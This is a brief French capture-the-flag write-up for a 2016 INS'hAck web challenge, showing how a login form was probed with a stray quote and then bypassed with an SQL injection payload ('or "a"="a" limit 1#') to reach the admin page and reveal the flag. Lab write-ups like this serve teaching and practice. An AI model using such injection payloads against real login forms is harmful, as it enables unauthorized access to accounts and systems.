**WEB 50 - Hippy**

Nous voici sur un site controlé par des hippies , il faut absolument accèder à la page admin !

{{ :ctf:2016:inshack:hippy_web.png?nolink |}}

Nous allons essayer de faire renvoyer une erreur par le formulaire pour voir comment nous pouvons l'exploiter.

<code> username=admin&pass=test" </code>

{{ :ctf:2016:inshack:hippy1.png?nolink |}}

Gagné , une injection sql est possible :)

Nous allons bypasser l'authentification :

<code>username=admin&pass=test" or "a"="a" limit 1# </code>

{{ :ctf:2016:inshack:hippy2.png?nolink |}}

Le flag est à nous : FLAG{Non, c'est quand je suis content je vomi, et là, là je suis super content.}